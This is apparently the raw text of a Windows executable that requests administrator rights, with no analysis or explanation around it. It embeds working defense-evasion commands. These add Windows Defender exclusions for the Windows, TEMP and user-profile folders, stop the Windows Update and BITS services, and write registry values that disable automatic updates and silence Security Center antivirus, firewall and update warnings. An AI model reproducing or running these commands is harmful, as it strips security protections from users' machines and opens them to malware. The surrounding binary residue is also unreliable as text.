!This program cannot be run in DOS mode.
/o3+/n3
/n3Rich
`.rdata
@.data
@.reloc
CheckedValue
DisableWindowsUpdateAccess
DisableWindowsUpdateAccess
NoAutoUpdate
NoAutoUpdate
SOFTWARE\Microsoft\Security Center
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
SOFTWARE\Microsoft\Security Center\Svc
FirewallOverride
FirewallDisableNotify
AntiSpywareOverride
AntiVirusOverride
AntiVirusDisableNotify
UpdatesOverride
UpdatesDisableNotify
_amsg_exit
__getmainargs
_cexit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
?terminate@@YAXXZ
MSVCR90.dll
_unlock
__dllonexit
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
_crt_debugger_hook
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
KERNEL32.dll
RegOpenKeyExA
RegCreateKeyExW
RegCloseKey
RegSetValueExA
RegOpenKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
</dependentAssembly>
</dependency>
</assembly>PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
02070<0D0M0R0W0_0o0z0
1%151@1S1]1g1w1
2#2-2B2M2i2s2}2
3!3=3G3Q3a3l3
4)434B4L4[4e4t4~4
5(575A5P5Z5i5s5
6#6-6G6Q6d6n6s6x6
6$7.747>7W7
7.848<8C8H8N8T8\8b8i8p8
9"969K9V9n9
;p;v;};
;1<T<a<m<u<}<
="=)=0=7=>=E=L=S=[=c=k=w=
/c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
cmd.exe
/c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
cmd.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
SYSTEM\CurrentControlSet\Services\UsoSvc
SYSTEM\CurrentControlSet\Services\WaaSMedicSvc
SYSTEM\CurrentControlSet\Services\wuauserv
SYSTEM\CurrentControlSet\Services\DoSvc
SYSTEM\CurrentControlSet\Services\BITS
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
SOFTWARE\Policies\Microsoft\Windows
WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU